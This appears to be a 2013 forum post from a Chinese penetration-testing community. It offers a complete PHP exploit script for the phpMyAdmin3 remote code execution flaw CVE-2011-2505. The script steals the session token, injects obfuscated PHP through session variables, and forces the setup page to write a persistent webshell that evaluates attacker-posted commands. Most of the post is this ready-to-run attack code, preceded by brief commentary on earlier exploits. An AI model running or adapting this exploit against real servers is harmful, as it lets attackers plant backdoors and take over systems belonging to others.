China Network Penetration Testing Alliance

Title: phpadmin3 remote code execute exploit, PHP version

Author: admin    Posted: 2013-2-21 09:13
Lately I've been a full-time stay-at-home dad, out of touch with the scene for many months, and the blog hasn't been updated either.

Last night I was up all night with the kid and saw heige's discussion of the phpMyAdmin3 vulnerability in the php security group. I hadn't looked at the vulnerable code before, though I had seen wofeiwo's exp on Weibo a while back; heige said there was a way to exploit it that isn't "jilei" (chicken ribs, i.e. of little practical value), so I dug through the code during the night and wrote this reheated exp. Since I got to it late and plenty of people had already studied it and written exps, mine is just warmed-over leftovers, research to pass the time.

First, kudos to wofeiwo's Python version of the exp, and kudos to wofeiwo's and superhei's dedication to digging in; role models to learn from. That earlier exp, though, has some limitations in use:
One, it needs session.auto_start = 1;
Two, in pma3's default code the libraries directory is already blocked by .htaccess.
And of course there is a third gap none of us can get past: the config directory must exist and be writable.

After reading heige's comments in the group and looking at the code again, I found the first two restrictions can both be ignored. So this vulnerability really isn't as "jilei" as it looked.

So I wrote this PHP version of the exp; the code is below:
5 h  E- Y% d" f2 c
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token:$token\n";
    echo "[+] Session ID:$sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

// Minimal raw HTTP/1.1 client: GET when $data is empty, otherwise a form POST.
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>